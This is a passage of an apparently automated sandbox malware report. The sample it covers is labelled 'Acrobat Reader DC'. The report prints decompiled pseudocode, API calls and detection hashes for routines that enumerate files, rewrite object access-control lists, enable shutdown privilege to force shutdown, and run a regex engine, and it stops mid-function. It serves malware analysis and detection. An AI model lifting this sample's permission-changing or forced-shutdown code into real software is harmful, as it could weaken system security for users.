                                  0x004428ff
                                  0x004428e4
                                  0x00000000
                                  0x00442903
                                  0x00442911
                                  0x00000000
                                  0x004428b6
                                  0x00000000

                                  APIs
                                  • FindFirstFileW.KERNEL32(?,?), ref: 004428A8
                                  • FindNextFileW.KERNEL32(00000000,?), ref: 0044290B
                                  • FindClose.KERNEL32(00000000), ref: 0044291C
                                  • FindClose.KERNEL32(00000000), ref: 00442930
                                  • FindFirstFileW.KERNEL32(*.*,?), ref: 0044294D
                                  • SetCurrentDirectoryW.KERNEL32(?), ref: 0044299C
                                  • SetCurrentDirectoryW.KERNEL32(0048AB30), ref: 004429BF
                                  • FindNextFileW.KERNEL32(00000000,00000010), ref: 004429C9
                                  • FindClose.KERNEL32(00000000), ref: 004429D4
                                    • Part of subcall function 00433C08: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 00433C2A
                                  • FindClose.KERNEL32(00000000), ref: 004429E2
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.286865083.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000A.00000002.286858320.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287083979.0000000000482000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287562025.0000000000490000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287926837.0000000000491000.00000008.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287941418.0000000000492000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287967313.00000000004A7000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.288002325.00000000004AB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: Find$File$Close$CurrentDirectoryFirstNext$Create
                                  • String ID: *.*
                                  • API String ID: 2640511053-438819550
                                  • Opcode ID: 8a47bb142582fb369a588aeabde8b58686abdf3d8367fad8d2448c9b03ae91f1
                                  • Instruction ID: 696d482812dd8bff2d9106dd2d2144e175b5fe2258968c3fd44c1969776f6f9a
                                  • Opcode Fuzzy Hash: 8a47bb142582fb369a588aeabde8b58686abdf3d8367fad8d2448c9b03ae91f1
                                  • Instruction Fuzzy Hash: AD410AB2A001186BDB10EBA5ED45FEF73689F89321F50465BFD0493280D6B8DE558BB8
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00446124 Relevance: 18.2, APIs: 12, Instructions: 182COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 100%
                                  			E00446124(void* __eflags, void* _a4, void* _a8, intOrPtr _a12) {
				char _v5;
				struct _ACL* _v12;
				void* _v16;
				struct _ACL* _v20;
				struct _ACL* _v24;
				long _v28;
				char _v32;
				int _v36;
				int _v40;
				intOrPtr _v48;
				void _v52;
				struct _ACL* _t70;
				void* _t74;
				void* _t78;
				void* _t84;
				void _t88;
				struct _ACL* _t94;
				signed short _t113;
				intOrPtr* _t115;
				struct _SECURITY_DESCRIPTOR* _t116;
				long _t117;
				void* _t118;
				void* _t119;

				_t118 = 0;
				_t94 = 0;
				_v5 = 0;
				_v20 = 0;
				_v24 = 0;
				_v16 = 0;
				_v28 = 4;
				if(E00436E2B(_a4,  &_v28,  &_v20,  &_v32) == 0 || E00436DF7( &_v24, _v32) == 0) {
					L20:
					E00436BA9(_v20);
					E00436BA9(_v24);
					E00436BA9(_t94);
					E00436BA9(_t118);
					return _v5;
				} else {
					_v12 = 0;
					if(GetSecurityDescriptorDacl(_v20,  &_v36,  &_v12,  &_v40) == 0) {
						goto L20;
					}
					E00412F40( &_v52, 0, 0xc);
					_t70 = _v12;
					_t119 = _t119 + 0xc;
					_v48 = 8;
					if(_t70 == 0 || GetAclInformation(_t70,  &_v52, 0xc, 2) != 0) {
						_t24 = GetLengthSid(_a8) * 2; // 0x18
						_t74 = E00436DBF( &_v16, _v48 + _t24 + 0x10);
						_t94 = _v16;
						if(_t74 == 0) {
							goto L20;
						}
						if(_v36 == _t118) {
							L12:
							_t36 = GetLengthSid(_a8) + 8; // 0x8
							_t113 = _t36;
							_t118 = E00436B91(_t113);
							_t119 = _t119 + 4;
							if(_t118 == 0) {
								goto L20;
							}
							_t78 = _a8;
							_t38 = _t118 + 8; // 0x8
							 *(_t118 + 2) = _t113;
							if(CopySid(GetLengthSid(_t78), _t38, _t78) == 0) {
								goto L20;
							}
							_a8 = 0;
							_t115 = _a12 + 4;
							while(1) {
								 *_t118 =  *((intOrPtr*)(_t115 - 4));
								 *((char*)(_t118 + 1)) =  *((intOrPtr*)(_t115 - 3));
								 *((intOrPtr*)(_t118 + 4)) =  *_t115;
								if(AddAce(_t94, 2, 0xffffffff, _t118,  *(_t118 + 2) & 0x0000ffff) == 0) {
									goto L20;
								}
								_t84 = _a8 + 1;
								_t115 = _t115 + 0xc;
								_a8 = _t84;
								if(_t84 < 2) {
									continue;
								}
								_t116 = _v24;
								if(SetSecurityDescriptorDacl(_t116, 1, _t94, 0) != 0 && SetUserObjectSecurity(_a4,  &_v28, _t116) != 0) {
									_v5 = 1;
								}
								goto L20;
							}
							goto L20;
						}
						_t88 = _v52;
						if(_t88 == _t118) {
							goto L12;
						}
						_t117 = 0;
						if(_t88 <= _t118) {
							goto L12;
						}
						while(GetAce(_v12, _t117,  &_v16) != 0 && AddAce(_t94, 2, 0xffffffff, _v16,  *(_v16 + 2) & 0x0000ffff) != 0) {
							_t117 = _t117 + 1;
							if(_t117 < _v52) {
								continue;
							}
							goto L12;
						}
					}
					goto L20;
				}
			}


























                                  0x0044613c
                                  0x0044613e
                                  0x00446141
                                  0x00446145
                                  0x00446148
                                  0x0044614b
                                  0x0044614e
                                  0x0044615c
                                  0x004462e6
                                  0x004462ea
                                  0x004462f3
                                  0x004462f9
                                  0x004462ff
                                  0x00446310
                                  0x00446177
                                  0x00446187
                                  0x00446192
                                  0x00000000
                                  0x00000000
                                  0x0044619f
                                  0x004461a4
                                  0x004461a7
                                  0x004461aa
                                  0x004461b3
                                  0x004461d9
                                  0x004461e2
                                  0x004461e7
                                  0x004461ec
                                  0x00000000
                                  0x00000000
                                  0x004461f5
                                  0x0044623d
                                  0x00446247
                                  0x00446247
                                  0x00446250
                                  0x00446252
                                  0x00446257
                                  0x00000000
                                  0x00000000
                                  0x0044625d
                                  0x00446261
                                  0x00446266
                                  0x00446279
                                  0x00000000
                                  0x00000000
                                  0x0044627e
                                  0x00446285
                                  0x00446288
                                  0x00446290
                                  0x0044629d
                                  0x004462a0
                                  0x004462ab
                                  0x00000000
                                  0x00000000
                                  0x004462b0
                                  0x004462b1
                                  0x004462b4
                                  0x004462ba
                                  0x00000000
                                  0x00000000
                                  0x004462bc
                                  0x004462cd
                                  0x004462e2
                                  0x004462e2
                                  0x00000000
                                  0x004462cd
                                  0x00000000
                                  0x00446288
                                  0x004461f7
                                  0x004461fc
                                  0x00000000
                                  0x00000000
                                  0x004461fe
                                  0x00446202
                                  0x00000000
                                  0x00000000
                                  0x00446204
                                  0x00446237
                                  0x0044623b
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x0044623b
                                  0x00446204
                                  0x00000000
                                  0x004461b3

                                  APIs
                                    • Part of subcall function 00436E2B: GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 00436E45
                                    • Part of subcall function 00436E2B: GetLastError.KERNEL32(?,00000000,?), ref: 00436E4F
                                    • Part of subcall function 00436E2B: GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 00436E75
                                    • Part of subcall function 00436DF7: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001), ref: 00436E12
                                  • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 0044618A
                                  • _memset.LIBCMT ref: 0044619F
                                  • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 004461BE
                                  • GetLengthSid.ADVAPI32(?), ref: 004461D0
                                  • GetAce.ADVAPI32(?,00000000,?), ref: 0044620D
                                  • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00446229
                                  • GetLengthSid.ADVAPI32(?), ref: 00446241
                                  • GetLengthSid.ADVAPI32(?,00000008,?), ref: 0044626A
                                  • CopySid.ADVAPI32(00000000), ref: 00446271
                                  • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 004462A3
                                  • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 004462C5
                                  • SetUserObjectSecurity.USER32 ref: 004462D8
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.286865083.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000A.00000002.286858320.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287083979.0000000000482000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287562025.0000000000490000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287926837.0000000000491000.00000008.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287941418.0000000000492000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287967313.00000000004A7000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.288002325.00000000004AB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: Security$DescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast_memset
                                  • String ID:
                                  • API String ID: 3490752873-0
                                  • Opcode ID: cf498e736c0040d611dc61921388a4e783ba54ad69564fff20abd6321b712b19
                                  • Instruction ID: cbecfdc94e872455e881353a2ef69e95113e06a92746e25f2a634f38edc45108
                                  • Opcode Fuzzy Hash: cf498e736c0040d611dc61921388a4e783ba54ad69564fff20abd6321b712b19
                                  • Instruction Fuzzy Hash: C251BC71A00209BBEB10EFA1CD84EEFB778BF49704F01855EF515A7241D6B8DA05CB69
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 004333BE Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 86shutdownCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 86%
                                  			E004333BE(int _a4, intOrPtr _a8) {
				void* _v8;
				intOrPtr _v12;
				struct _TOKEN_PRIVILEGES _v24;
				int _t27;
				int _t29;
				int _t31;

				_t29 = _a4;
				if(OpenProcessToken(GetCurrentProcess(), 0x28,  &_v8) == 0) {
					L2:
					return 0;
				} else {
					LookupPrivilegeValueW(0, L"SeShutdownPrivilege",  &(_v24.Privileges));
					_v24.PrivilegeCount = 1;
					_v12 = 2;
					AdjustTokenPrivileges(_v8, 0,  &_v24, 0, 0, 0);
					if(GetLastError() == 0) {
						if(_t29 == 0x20) {
							return SetSystemPowerState(1, 0);
						} else {
							if(_t29 == 0x40) {
								return SetSystemPowerState(0, 0);
							} else {
								if((_t29 & 0x0000000b) != 0) {
									_t31 = 0;
									if((_t29 & 0x00000014) != 0) {
										_t31 = 1;
									}
									_t27 = 0;
									if((_t29 & 0x00000002) != 0) {
										_t27 = 1;
									}
									__imp__InitiateSystemShutdownExW(0, 0, 0, _t31, _t27, _a8);
									return _t27;
								} else {
									return ExitWindowsEx(_t29, 0);
								}
							}
						}
					} else {
						goto L2;
					}
				}
			}









                                  0x004333c5
                                  0x004333dd
                                  0x0043341e
                                  0x00433424
                                  0x004333df
                                  0x004333ea
                                  0x00433400
                                  0x00433407
                                  0x0043340e
                                  0x0043341c
                                  0x00433428
                                  0x00433483
                                  0x0043342a
                                  0x0043342d
                                  0x00433492
                                  0x0043342f
                                  0x00433432
                                  0x00433442
                                  0x00433447
                                  0x00433449
                                  0x00433449
                                  0x0043344e
                                  0x00433453
                                  0x00433455
                                  0x00433455
                                  0x00433466
                                  0x00433470
                                  0x00433434
                                  0x00433441
                                  0x00433441
                                  0x00433432
                                  0x0043342d
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x0043341c

                                  APIs
                                  • GetCurrentProcess.KERNEL32(00000028,?), ref: 004333CE
                                  • OpenProcessToken.ADVAPI32(00000000), ref: 004333D5
                                  • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 004333EA
                                  • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 0043340E
                                  • GetLastError.KERNEL32 ref: 00433414
                                  • ExitWindowsEx.USER32(?,00000000), ref: 00433437
                                  • InitiateSystemShutdownExW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,?), ref: 00433466
                                  • SetSystemPowerState.KERNEL32(00000001,00000000), ref: 00433479
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.286865083.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000A.00000002.286858320.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287083979.0000000000482000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287562025.0000000000490000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287926837.0000000000491000.00000008.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287941418.0000000000492000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287967313.00000000004A7000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.288002325.00000000004AB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: ProcessSystemToken$AdjustCurrentErrorExitInitiateLastLookupOpenPowerPrivilegePrivilegesShutdownStateValueWindows
                                  • String ID: SeShutdownPrivilege
                                  • API String ID: 2938487562-3733053543
                                  • Opcode ID: e998af62085c6697935ed50d35c6a1543144275e53dff9101095b3913992069c
                                  • Instruction ID: ad32a9094aef850e2966724807b7d50af50c82f056daff98c21d8f44207777ad
                                  • Opcode Fuzzy Hash: e998af62085c6697935ed50d35c6a1543144275e53dff9101095b3913992069c
                                  • Instruction Fuzzy Hash: F221C971640205ABF7108FA4EC4EF7FB3ACE708702F144569FE09D51D1D6BA5D408765
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0043305F Relevance: 16.6, APIs: 11, Instructions: 122COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 97%
                                  			E0043305F(void* __edx, void* __edi, struct HINSTANCE__* _a4, int _a12, void* _a16) {
				char _v16;
				char _v28;
				struct HRSRC__* _t27;
				void* _t28;
				void* _t29;
				void* _t34;
				BYTE* _t36;
				int _t38;
				signed char* _t43;
				int _t49;
				struct HRSRC__* _t61;
				long _t63;
				WCHAR* _t65;
				struct HINSTANCE__* _t66;

				_t65 = _a12;
				E0041329B(__edx,  &_v16, L"%d", _t65);
				E0041329B( &_v28,  &_v28, L"%d", _a16);
				if(E004114AB(__edi,  &_v28,  &_v16) != 0) {
					L2:
					return 1;
				} else {
					_t66 = _a4;
					_t27 = FindResourceW(_t66, _t65, 0xe);
					if(_t27 != 0) {
						_t28 = LoadResource(_t66, _t27);
						if(_t28 == 0) {
							goto L2;
						} else {
							_push(__edi);
							_t29 = LockResource(_t28);
							_a4 = _t29;
							_a12 = 0;
							if(0 >=  *((intOrPtr*)(_t29 + 4))) {
								L15:
								return 0;
							} else {
								_t11 = _t29 + 6; // 0x6
								_t43 = _t11;
								while(1) {
									_t61 = FindResourceW(_t66, _t43[0xc] & 0x0000ffff, 3);
									if(_t61 == 0) {
										break;
									}
									_t34 = LoadResource(_t66, _t61);
									_a16 = _t34;
									if(_t34 == 0) {
										break;
									} else {
										_t63 = SizeofResource(_t66, _t61);
										_t36 = LockResource(_a16);
										_t49 =  *0x497530;
										if(( *_t43 & 0x000000ff) != _t49 || (_t43[1] & 0x000000ff) !=  *0x49752c || (_t43[6] & 0x0000ffff) !=  *0x497528) {
											_t38 = _a12 + 1;
											_t43 =  &(_t43[0xe]);
											_a12 = _t38;
											if(_t38 < ( *(_a4 + 4) & 0x0000ffff)) {
												continue;
											} else {
												return 0;
											}
										} else {
											 *0x497534 = CreateIconFromResourceEx(_t36, _t63, 1, 0x30000, _t49,  *0x49752c, 0);
											goto L15;
										}
									}
									goto L16;
								}
								return 1;
							}
						}
					} else {
						goto L2;
					}
				}
				L16:
			}

















                                  0x00433066
                                  0x00433073
                                  0x00433085
                                  0x0043309c
                                  0x004330af
                                  0x004330b8
                                  0x0043309e
                                  0x004330a1
                                  0x004330a5
                                  0x004330ad
                                  0x004330bd
                                  0x004330c5
                                  0x00000000
                                  0x004330c7
                                  0x004330c8
                                  0x004330ca
                                  0x004330d2
                                  0x004330d5
                                  0x004330e0
                                  0x00433197
                                  0x0043319f
                                  0x004330e6
                                  0x004330e6
                                  0x004330e6
                                  0x004330ef
                                  0x004330fd
                                  0x00433101
                                  0x00000000
                                  0x00000000
                                  0x00433105
                                  0x0043310b
                                  0x00433110
                                  0x00000000
                                  0x00433112
                                  0x0043311e
                                  0x00433120
                                  0x00433129
                                  0x00433131
                                  0x00433155
                                  0x00433156
                                  0x00433159
                                  0x0043315e
                                  0x00000000
                                  0x00433160
                                  0x00433168
                                  0x00433168
                                  0x00433179
                                  0x00433192
                                  0x00000000
                                  0x00433192
                                  0x00433131
                                  0x00000000
                                  0x00433110
                                  0x00433176
                                  0x00433176
                                  0x004330e0
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x004330ad
                                  0x00000000

                                  APIs
                                  • __swprintf.LIBCMT ref: 00433073
                                  • __swprintf.LIBCMT ref: 00433085
                                  • __wcsicoll.LIBCMT ref: 00433092
                                  • FindResourceW.KERNEL32(?,?,0000000E), ref: 004330A5
                                  • LoadResource.KERNEL32(?,00000000), ref: 004330BD
                                  • LockResource.KERNEL32(00000000), ref: 004330CA
                                  • FindResourceW.KERNEL32(?,?,00000003), ref: 004330F7
                                  • LoadResource.KERNEL32(?,00000000), ref: 00433105
                                  • SizeofResource.KERNEL32(?,00000000), ref: 00433114
                                  • LockResource.KERNEL32(?), ref: 00433120
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.286865083.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000A.00000002.286858320.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287083979.0000000000482000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287562025.0000000000490000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287926837.0000000000491000.00000008.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287941418.0000000000492000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287967313.00000000004A7000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.288002325.00000000004AB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: Resource$FindLoadLock__swprintf$Sizeof__wcsicoll
                                  • String ID:
                                  • API String ID: 1158019794-0
                                  • Opcode ID: b140e135c5f727b40d296f2f4b3108eaeb1a217ee9fa6a28346dce69b8385e70
                                  • Instruction ID: 48d2d5a3af9b637b7fc6f2c6b5a7fdd3517197a5f8dc2ef3994740021b7ed835
                                  • Opcode Fuzzy Hash: b140e135c5f727b40d296f2f4b3108eaeb1a217ee9fa6a28346dce69b8385e70
                                  • Instruction Fuzzy Hash: C741F1322002146BDB10EF65EC84FAB37ADEB89321F00846BFD01C6245E779DA51C7A8
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0044663B Relevance: 11.4, APIs: 1, Strings: 5, Instructions: 895COMMONCrypto
                                  Download Yara Rule
                                  C-Code - Quality: 70%
                                  			E0044663B(signed int _a4, signed int _a8, intOrPtr _a12, signed int _a16, signed int _a20, signed int _a24, signed int _a28) {
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				signed int _v76;
				signed int _v80;
				intOrPtr _v84;
				signed int* _v88;
				signed int _v92;
				intOrPtr _v96;
				intOrPtr _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				signed int _v124;
				signed int _v128;
				signed int _v132;
				signed int _v136;
				signed int _v140;
				signed int _v144;
				intOrPtr _v148;
				intOrPtr _v152;
				signed int _v155;
				signed int _v156;
				intOrPtr _v160;
				signed int _v164;
				signed int _v168;
				signed int _v172;
				signed int _v176;
				intOrPtr _v180;
				signed int _v184;
				void* _v188;
				intOrPtr _v192;
				intOrPtr _v196;
				signed int _v200;
				signed int _v204;
				signed int _v208;
				signed int _v212;
				signed int _v216;
				signed int _v220;
				signed int _v224;
				signed int _v228;
				signed int _v232;
				signed int _v236;
				signed int _v240;
				char _v280;
				char _v324;
				signed int _t327;
				signed int _t334;
				signed char _t335;
				signed int _t343;
				signed int _t366;
				signed int _t368;
				signed int _t371;
				unsigned int _t372;
				signed int _t380;
				signed int _t387;
				signed int _t389;
				signed int _t391;
				signed int _t393;
				signed int _t394;
				signed int _t400;
				signed int _t402;
				signed int _t404;
				signed int _t406;
				signed int _t407;
				signed int _t410;
				signed int _t412;
				int _t413;
				signed int _t418;
				signed int _t419;
				signed int _t421;
				signed int _t428;
				unsigned int _t430;
				signed int _t432;
				signed int _t434;
				void* _t439;
				signed int _t445;
				signed int _t447;
				signed int _t448;
				signed int _t454;
				signed int _t461;
				signed int _t462;
				signed int _t463;
				signed int _t466;
				intOrPtr _t468;
				signed int _t471;
				signed int _t476;
				signed int _t477;
				signed int _t487;
				signed int _t489;
				signed int _t504;
				signed int _t505;
				signed int _t510;
				signed int _t522;
				signed int _t526;
				signed int _t527;
				signed int _t528;
				intOrPtr* _t529;
				signed int _t532;
				signed int _t548;
				signed int _t550;
				void* _t552;
				unsigned int _t555;
				signed int _t559;
				signed int _t560;
				signed int _t566;
				signed int _t567;
				void* _t568;
				signed int _t569;
				signed int _t570;
				signed int* _t572;
				signed int _t574;
				intOrPtr* _t576;
				intOrPtr* _t578;
				intOrPtr _t579;
				signed int _t580;
				void* _t582;
				intOrPtr* _t583;
				intOrPtr _t584;
				signed int _t585;
				signed int _t586;
				signed int _t590;
				signed int _t591;
				void* _t592;

				_t327 = _a16;
				_t510 = _a8;
				_t462 = _a20;
				_t585 = _a4;
				_t560 = _t559 | 0xffffffff;
				_v28 = _t560;
				_v228 = _t560;
				_v204 = _t560;
				_t461 = _t510 + _t327;
				_v32 = 0;
				_v36 = 0;
				_v224 = 0;
				_v20 = 0;
				_v216 = _t461 - 1;
				if((_t462 & 0xe20f5a6f) == 0) {
					__eflags = _t585;
					if(_t585 == 0) {
						L228:
						return 0xfffffffe;
					}
					__eflags = _t510;
					if(_t510 == 0) {
						goto L228;
					}
					__eflags = _a24;
					if(_a24 == 0) {
						__eflags = _a28;
						if(_a28 > 0) {
							goto L228;
						}
					}
					__eflags = _a28;
					if(_a28 >= 0) {
						__eflags = _t327;
						if(_t327 < 0) {
							L227:
							return 0xffffffe8;
						} else {
							__eflags = _t327 - _a12;
							if(_t327 > _a12) {
								goto L227;
							} else {
								_v160 = ( *(_t585 + 0x18) & 0x0000ffff) + _t585;
								_v164 =  *(_t585 + 0x1a) & 0x0000ffff;
								_v196 = 0x989680;
								_v192 = 0x989680;
								_t334 =  *(_t585 + 0x20);
								_v168 =  *(_t585 + 0x1c) & 0x0000ffff;
								_v48 = 0;
								_v12 = _t334;
								__eflags = _t334;
								if(_t334 == 0) {
									_v12 = 0x486a58;
								}
								__eflags =  *_t585 - 0x50435245;
								if(__eflags == 0) {
									L16:
									_t335 =  *(_t585 + 8);
									_v208 = _t335 >> 0x00000012 & 0x00000001;
									_v212 = (_t462 & 0x000000ff | _t335 & 0x000000ff) >> 0x00000004 & 0x00000001;
									_v232 = ( *(_t585 + 0xc) & 0x000000ff) >> 0x00000003 & 0x00000001;
									_t522 = _a8;
									_v100 = ( *(_t585 + 0x18) & 0x0000ffff) + ( *(_t585 + 0x1c) & 0x0000ffff) * ( *(_t585 + 0x1a) & 0x0000ffff) + _a4;
									_v64 = _a16;
									_t343 = _a12 + _t522;
									_v92 = _t343;
									_a4 = _t343;
									_v96 = _t522;
									_v120 = ( *(_t585 + 8) & 0x000000ff) >> 0x00000005 & 0x00000001;
									_t566 =  *(_t585 + 8) >> 0x0000000b & 0x00000001;
									_v132 = _t566;
									_v124 =  *(_t585 + 8) >> 0x0000001d & 0x00000001;
									_v128 =  *(_t585 + 8) >> 0x00000019 & 0x00000001;
									__eflags = _t462 & 0x00000080;
									_v16 = _t566;
									_v140 = 0 | (_t462 & 0x00000080) != 0x00000000;
									_v136 = _t462 >> 0x00000008 & 0x00000001;
									_v116 = _t462 >> 0x0000000a & 0x00000001;
									_v112 = _t462 >> 0x0000001c & 0x00000001;
									__eflags = _t462 & 0x08000000;
									if((_t462 & 0x08000000) == 0) {
										_t366 = _t462 >> 0x0000000f & 0x00000001;
										__eflags = _t366;
									} else {
										_t366 = 2;
									}
									_v76 = _t366;
									_v108 = 0;
									_v44 = 0;
									_v52 = 0;
									_t368 = _v12;
									_v152 = _t368;
									_v148 = _t368 + 0x340;
									_t371 = _t462 & 0x01800000;
									__eflags = _t371;
									if(_t371 == 0) {
										_t372 =  *(_t585 + 8);
										__eflags = _t372 & 0x01800000;
										if((_t372 & 0x01800000) == 0) {
											goto L26;
										} else {
											_v104 = _t372 >> 0x00000017 & 0x00000001;
										}
										goto L27;
									} else {
										__eflags = _t371 - 0x800000;
										if(_t371 == 0x800000) {
											_v104 = 1;
											L27:
											__eflags = _t462 & 0x00700000;
											if((_t462 & 0x00700000) == 0) {
												_t462 =  *(_t585 + 8);
											}
											_t463 = _t462 & 0x00700000;
											__eflags = _t463 - 0x300000;
											if(__eflags > 0) {
												__eflags = _t463 - 0x400000;
												if(_t463 == 0x400000) {
													_v176 = 1;
													goto L44;
												} else {
													__eflags = _t463 - 0x500000;
													if(_t463 != 0x500000) {
														goto L22;
													} else {
														_v176 = 2;
														goto L44;
													}
												}
											} else {
												if(__eflags == 0) {
													_t454 = 0xd0a;
													goto L35;
												} else {
													__eflags = _t463;
													if(_t463 == 0) {
														L34:
														_t454 = 0xa;
														goto L35;
													} else {
														__eflags = _t463 - 0x100000;
														if(_t463 == 0x100000) {
															_t454 = 0xd;
															L35:
															_v176 = 0;
															__eflags = _t454 - 0xff;
															if(_t454 <= 0xff) {
																_v172 = 1;
																_v156 = _t454;
															} else {
																_v172 = 2;
																_v156 = _t454 >> 8;
																_v155 = _t454;
															}
															L44:
															__eflags = _v76;
															if(_v76 == 0) {
																L47:
																__eflags = _t566;
																if(_t566 == 0) {
																	L57:
																	_v240 =  *(_t585 + 8) & 0x00000007;
																	_t567 = (0x55555556 * _a28 >> 0x20 >> 0x1f) + (0x55555556 * _a28 >> 0x20) + ((0x55555556 * _a28 >> 0x20 >> 0x1f) + (0x55555556 * _a28 >> 0x20)) * 2;
																	_t380 =  *(_t585 + 0x12) & 0x0000ffff;
																	__eflags = _t380;
																	if(_t380 == 0) {
																		L62:
																		_v188 = _a24;
																		goto L63;
																	} else {
																		_t505 = _t380;
																		_t555 = 0x55555556 * _t567 >> 0x20;
																		__eflags = _t505 - (_t555 >> 0x1f) + _t555;
																		if(_t505 < (_t555 >> 0x1f) + _t555) {
																			goto L62;
																		} else {
																			_t567 = _t505 + 3 + _t505 * 2;
																			_t445 =  *0x491490(_t567 * 4);
																			_t592 = _t592 + 4;
																			_v188 = _t445;
																			__eflags = _t445;
																			if(_t445 != 0) {
																				_v32 = 1;
																				L63:
																				_v184 = _t567;
																				_v180 = (0x55555556 * (_t567 + _t567) >> 0x20 >> 0x1f) + (0x55555556 * (_t567 + _t567) >> 0x20);
																				_v144 = 0;
																				_v68 = 0xffffffff;
																				_t466 = ( *(_t585 + 0x10) & 0x0000ffff) + ( *(_t585 + 0x10) & 0x0000ffff) + 2;
																				_v220 = _t466;
																				__eflags = _t466 - _a28;
																				if(_t466 > _a28) {
																					_t466 = _t567;
																					_v220 = _t567;
																				}
																				__eflags = _v188;
																				if(_v188 != 0) {
																					_t552 = _v188;
																					_t582 = _t552 + _t567 * 4;
																					asm("cdq");
																					_t439 = _t582 + (1 - (_t466 - _t552 >> 1)) * 4;
																					_t583 = _t582 - 4;
																					__eflags = _t583 - _t439;
																					while(_t583 >= _t439) {
																						 *_t583 = 0xffffffff;
																						_t583 = _t583 - 4;
																						__eflags = _t583 - _t439;
																					}
																				}
																				__eflags = _v212;
																				if(_v212 == 0) {
																					__eflags =  *(_t585 + 0xc) & 0x00000002;
																					if(( *(_t585 + 0xc) & 0x00000002) != 0) {
																						_t434 =  *(_t585 + 0x14) & 0x0000ffff;
																						_t550 = _t434 & 0x000000ff;
																						_v28 = _t550;
																						__eflags = _t434 & 0x00000100;
																						if((_t434 & 0x00000100) == 0) {
